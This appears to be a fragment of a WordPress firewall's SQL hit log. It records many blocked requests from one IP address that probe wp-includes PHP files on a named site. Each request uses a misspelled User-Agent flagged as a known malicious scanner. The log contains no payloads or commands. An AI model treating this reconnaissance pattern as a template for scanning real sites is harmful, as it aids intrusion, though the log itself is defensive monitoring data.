User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXhtbHJwYy1zZXJ2ZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133641,1699888524.608827,1699888524.599500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-widget.php','http://eckankar-colorado.org/wp-includes/class-wp-widget.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXdpZGdldC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133642,1699888524.229618,1699888524.220200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-widget-factory.php','http://eckankar-colorado.org/wp-includes/class-wp-widget-factory.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXdpZGdldC1mYWN0b3J5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133643,1699888523.890534,1699888523.881900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-walker.php','http://eckankar-colorado.org/wp-includes/class-wp-walker.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXdhbGtlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133644,1699888523.553079,1699888523.544400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-user.php','http://eckankar-colorado.org/wp-includes/class-wp-user.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXVzZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133645,1699888523.206407,1699888523.197000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-user-request.php','http://eckankar-colorado.org/wp-includes/class-wp-user-request.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXVzZXItcmVxdWVzdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133646,1699888522.868778,1699888522.860100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-user-query.php','http://eckankar-colorado.org/wp-includes/class-wp-user-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXVzZXItcXVlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133647,1699888522.509221,1699888522.487700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-user-meta-session-tokens.php','http://eckankar-colorado.org/wp-includes/class-wp-user-meta-session-tokens.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXVzZXItbWV0YS1zZXNzaW9uLXRva2Vucy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133648,1699888522.158594,1699888522.148700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme.php','http://eckankar-colorado.org/wp-includes/class-wp-theme.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133649,1699888521.814434,1699888521.805700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json.php','http://eckankar-colorado.org/wp-includes/class-wp-theme-json.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133650,1699888521.470380,1699888521.461600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json-schema.php','http://eckankar-colorado.org/wp-includes/class-wp-theme-json-schema.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24tc2NoZW1hLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133651,1699888521.078766,1699888521.050600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json-resolver.php','http://eckankar-colorado.org/wp-includes/class-wp-theme-json-resolver.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24tcmVzb2x2ZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133652,1699888520.700510,1699888520.691800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json-data.php','http://eckankar-colorado.org/wp-includes/class-wp-theme-json-data.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24tZGF0YS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133653,1699888520.357032,1699888520.341400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-textdomain-registry.php','http://eckankar-colorado.org/wp-includes/class-wp-textdomain-registry.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRleHRkb21haW4tcmVnaXN0cnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133654,1699888519.968887,1699888519.960200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-text-diff-renderer-table.php','http://eckankar-colorado.org/wp-includes/class-wp-text-diff-renderer-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRleHQtZGlmZi1yZW5kZXJlci10YWJsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133655,1699888519.623572,1699888519.609700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-text-diff-renderer-inline.php','http://eckankar-colorado.org/wp-includes/class-wp-text-diff-renderer-inline.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRleHQtZGlmZi1yZW5kZXJlci1pbmxpbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133656,1699888519.274629,1699888519.265400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-term.php','http://eckankar-colorado.org/wp-includes/class-wp-term.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRlcm0ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133657,1699888518.854745,1699888518.846100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-term-query.php','http://eckankar-colorado.org/wp-includes/class-wp-term-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRlcm0tcXVlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133658,1699888518.518309,1699888518.509700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-taxonomy.php','http://eckankar-colorado.org/wp-includes/class-wp-taxonomy.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRheG9ub215LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133659,1699888518.179724,1699888518.171100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-tax-query.php','http://eckankar-colorado.org/wp-includes/class-wp-tax-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRheC1xdWVyeS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133660,1699888517.841876,1699888517.826500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-styles.php','http://eckankar-colorado.org/wp-includes/class-wp-styles.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133661,1699888517.495960,1699888517.487200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-site.php','http://eckankar-colorado.org/wp-includes/class-wp-site.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNpdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133662,1699888517.158229,1699888517.149500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-site-query.php','http://eckankar-colorado.org/wp-includes/class-wp-site-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNpdGUtcXVlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133663,1699888516.771830,1699888516.763100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-simplepie-sanitize-kses.php','http://eckankar-colorado.org/wp-includes/class-wp-simplepie-sanitize-kses.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNpbXBsZXBpZS1zYW5pdGl6ZS1rc2VzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133664,1699888516.423955,1699888516.414800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-simplepie-file.php','http://eckankar-colorado.org/wp-includes/class-wp-simplepie-file.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNpbXBsZXBpZS1maWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133665,1699888516.062614,1699888516.053900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-session-tokens.php','http://eckankar-colorado.org/wp-includes/class-wp-session-tokens.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 